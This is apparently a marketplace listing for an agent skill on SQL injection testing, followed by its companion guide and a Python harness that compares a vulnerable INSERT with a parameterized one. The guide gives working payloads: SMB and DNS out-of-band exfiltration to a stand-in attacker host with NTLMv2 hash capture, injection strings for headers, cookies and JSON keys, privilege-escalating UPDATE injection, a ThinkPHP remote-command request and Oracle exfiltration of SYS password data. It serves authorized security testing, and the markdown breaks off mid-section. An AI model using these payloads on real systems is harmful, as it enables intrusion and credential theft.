
Sqli Sql Injection
Apply structured SQL injection techniques and real-world scenarios when reviewing or pentesting your own APIs and forms before release.
Overview
sqli-sql-injection is an agent skill most often used in Ship security (also Build backend integrations and Operate errors) that extends SQL injection testing with real-world injection points and out-of-band exfiltration.
Install
npx skills add https://github.com/yaklang/hack-skills --skill sqli-sql-injection
What is this skill?
- Extended scenarios beyond SELECT-only training: INSERT, UPDATE, DELETE, ORDER BY, and API sort-parameter injection differences
- KEY and URI injection matrix—JSON key names, path segments, headers, cookies, multipart filenames, and ORDER BY from sort parameters
- SMB out-of-band exfiltration on Windows MySQL with LOAD_FILE, DNS hostname leakage, and NTLMv2 capture via Responder com
- Companion depth doc to SKILL.md with CVE-style case studies and engagement-oriented injection techniques.
- Injection-point table covers at least seven channels including JSON keys, URI paths, headers, cookies, multipart filenames
Adoption & trust: 1.2k installs on skills.sh; 980 GitHub stars; 1/3 security scanners passed (skills.sh audits).
What problem does it solve?
You ship forms and APIs backed by SQL but only test obvious GET/POST fields and miss headers, JSON keys, and write-path injection that attackers still exploit.
Who is it for?
Builders running authorized pre-release security review on their own SaaS, API, or admin backends who need scenario depth beyond basic UNION tutorials.
Skip if: Attacking third-party sites without permission, or teams wanting automated CI scanners only with no manual injection methodology.
When should I use this skill?
User needs SQL injection extended scenarios, real-world cases, OOB exfiltration techniques, or non-SELECT write-path injection guidance for authorized testing.
What do I get? / Deliverables
You gain a structured checklist of injection surfaces and techniques—including OOB SMB/DNS paths—to reproduce findings in authorized staging before production.
- Structured injection surface checklist for manual or agent-driven probes
- Scenario notes for SMB/DNS OOB and CVE-style case patterns from the companion doc
Journey fit
Spans multiple journey phases - primary shelf plus alternate fits below.
Canonical shelf is Ship security because injection testing belongs in pre-release hardening, though the same patterns inform validate prototypes and operate incident response. Security subphase covers offensive testing knowledge used to find and fix SQLi in parameters, headers, cookies, and less-tested injection points.
Where it fits
Map JSON key and path-segment injection risks while wiring dynamic ORDER BY from API sort parameters.
Run extended INSERT/UPDATE/DELETE and header/cookie injection checks in staging before production cutover.
Correlate suspicious query errors with OOB or KEY injection patterns documented for incident triage on your own service.
How it compares
Use as procedural pentest reference paired with your staging app—not as a generic linter that replaces parameterized queries and ORM discipline.
Common Questions / FAQ
Who is sqli-sql-injection for?
Solo developers and small teams with SQL-backed APIs who perform authorized security testing and want engagement-style SQLi scenarios in the agent.
When should I use sqli-sql-injection?
Use it in Ship security before launch, in Build backend integrations while designing query boundaries, and in Operate errors when investigating suspected injection in logs—always on systems you are allowed to test.
Is sqli-sql-injection safe to install?
The skill describes offensive techniques for defensive use; review Security Audits on this Prism page and restrict invocation to authorized environments you control.
# SQL Injection — Extended Scenarios & Real-World Cases

> Companion to [SKILL.md](./SKILL.md). Contains additional attack scenarios, CVE case studies, and injection techniques from real-world engagements.

---

## 1. SMB Out-of-Band Exfiltration (MySQL on Windows)

When the MySQL server runs on Windows with outbound SMB allowed:

```sql
SELECT LOAD_FILE(CONCAT('\\\\', (SELECT user()), '.attacker.com\\share'));
-- Triggers SMB connection → DNS lookup with data in hostname

-- More complete:
SELECT LOAD_FILE(CONCAT('\\\\attacker-ip\\', user(), '\\l.txt'));
-- SMB authentication attempt → attacker captures NTLMv2 hash via Responder
```

**Compared to DNS exfiltration**: SMB exfil can also leak NTLM hashes, enabling offline password cracking. DNS exfil is more reliable across firewalls.

---

## 2. KEY Injection / URI Injection

Beyond GET/POST parameters, SQL injection may occur in less-tested locations:

| Injection Point | Example |
|---|---|
| JSON key names | `{"admin' OR 1=1--": "value"}` — if key is used in column name |
| URI path segments | `/api/users/1 OR 1=1` — if path param enters SQL |
| HTTP headers | `X-Forwarded-For: 127.0.0.1' OR 1=1--` |
| Cookie values | `session=abc' UNION SELECT...` |
| Multipart filename | `filename="test' OR '1'='1.jpg"` |
| ORDER BY from API sort param | `?sort=name;SELECT SLEEP(5)--` |

---

## 3. INSERT / DELETE / UPDATE Injection Differences

Most SQLi training focuses on SELECT. Real applications use INSERT/UPDATE/DELETE with different exploitation strategies:

### INSERT Statement Injection

```sql
-- Original:
INSERT INTO logs (user, action) VALUES ('INPUT', 'login');
-- Injection in user field:
INPUT: admin', 'login'), ('attacker', (SELECT password FROM users LIMIT 1))--
-- Result:
INSERT INTO logs (user, action) VALUES ('admin', 'login'), ('attacker', 'actual_password')--', 'login');
-- Exfiltrates data into a visible log table
```

### UPDATE Statement Injection

```sql
-- Original:
UPDATE users SET email='INPUT' WHERE id=5;
-- Injection:
'), admin=1 WHERE username='victim'--
-- Result:
UPDATE users SET email=''), admin=1 WHERE username='victim'--' WHERE id=5;
-- Escalates victim's privileges
```

### DELETE Statement Injection

```sql
-- Application's own statement (the injectable sink):
DELETE FROM cart WHERE item_id='INPUT' AND user_id=5;
-- Non-destructive proof: confirm injection with a time-based payload, not by widening the WHERE:
-- Injection: 1' AND IF((SELECT 1),SLEEP(5),0)--
-- Note: a boolean payload (e.g. 1' OR '1'='1) would match every row (DoS / data destruction) — do not run it against real data.
```

---

## 4. CVE Case: ThinkPHP5 SQL Injection

ThinkPHP5 framework's `where` method improperly handles array parameters:

```
POST /index/think\app/invokefunction
Content-Type: application/x-www-form-urlencoded

function=call_user_func_array&vars[0]=system&vars[1][]=id
```

Error-based extraction using `updatexml`:

```sql
id=1' AND updatexml(1, concat(0x7e, (SELECT user()), 0x7e), 1)--
```

---

## 5. CVE Case: Django GIS SQL Injection (CVE-2020-9402)

Django's GIS `GeoQuerySet` methods (e.g., `annotate` with `RawSQL`) on Oracle backend allow error-based injection via `utl_inaddr.get_host_name`:

```sql
-- Oracle error-based exfiltration:
' AND 1=utl_inaddr.get_host_name((SELECT user FROM dual))--
-- Oracle raises ORA-29257 containing the username in the error message

-- DNS-based out-of-band on Oracle:
' AND 1=UTL_INADDR.GET_HOST_NAME((SELECT password FROM dba_users WHERE username='SYS')||'.attacker.com')--
```

**Takeaway**: Oracle-specific functions (`utl_inaddr`, `utl_http`, `dbms_ldap`) are powerful OOB channels that bypass most firewall restrictions.

---

## 6. SQL Injection via Different SQL Verbs

Applications may use different HTTP methods and SQL verbs for the same endpoint:

```text
GET    /api/items?id=1   → SELECT (read)
POST   /api/items        → INSERT (create)
PUT    /api/items/1      → UPDATE (modify)
DELETE /api/items/1      → DELETE (remov
```
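As an added example (not code from the skill's repository), the following Python/sqlite3 harness lets a developer verify their own write-path sinks: the string-spliced INSERT sink from section 3 beside its parameterized form, exercised with the page's own INSERT payload, plus an allowlist for the ORDER BY sort parameter from section 2. The table names, columns and sample rows are constructed for the demonstration.

```python
import sqlite3

# Constructed sample schema and rows (not from any real engagement).
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (username TEXT, password TEXT);
        CREATE TABLE logs (user TEXT, action TEXT);
        INSERT INTO users VALUES ('victim', 'secret-hash');
    """)
    return db

# The INSERT payload from section 3, used here only to check the two sinks below.
PAYLOAD = "admin', 'login'), ('attacker', (SELECT password FROM users LIMIT 1))--"

# Vulnerable sink: the user field is spliced into the statement text, so the
# payload adds a second row that copies a password into the log table.
def log_login_vulnerable(db, user):
    db.execute(f"INSERT INTO logs (user, action) VALUES ('{user}', 'login');")
    return list(db.execute("SELECT user, action FROM logs"))

# Hardened sink: the value is bound as a parameter and stored as inert text.
def log_login_safe(db, user):
    db.execute("INSERT INTO logs (user, action) VALUES (?, 'login')", (user,))
    return list(db.execute("SELECT user, action FROM logs"))

# ORDER BY targets cannot be bound as parameters, so map the API sort name
# onto a fixed allowlist of columns and reject anything else.
SORT_COLUMNS = {"name": "name", "created": "created_at"}

def build_sort_query(sort_param):
    field, _, direction = sort_param.partition(":")
    direction = direction or "asc"
    if field not in SORT_COLUMNS or direction not in ("asc", "desc"):
        raise ValueError(f"rejected sort parameter: {sort_param!r}")
    return f"SELECT id, name FROM items ORDER BY {SORT_COLUMNS[field]} {direction}"

def sort_is_accepted(sort_param):
    try:
        build_sort_query(sort_param)
        return True
    except ValueError:
        return False

if __name__ == "__main__":
    print(log_login_vulnerable(make_db(), PAYLOAD))    # second row holds the password
    print(log_login_safe(make_db(), PAYLOAD))          # payload stored verbatim, one row
    print(sort_is_accepted("name;SELECT SLEEP(5)--"))  # False
```

The same contrast applies to the UPDATE and DELETE sinks in section 3: bind every user-supplied value, and allowlist anything that must become an identifier.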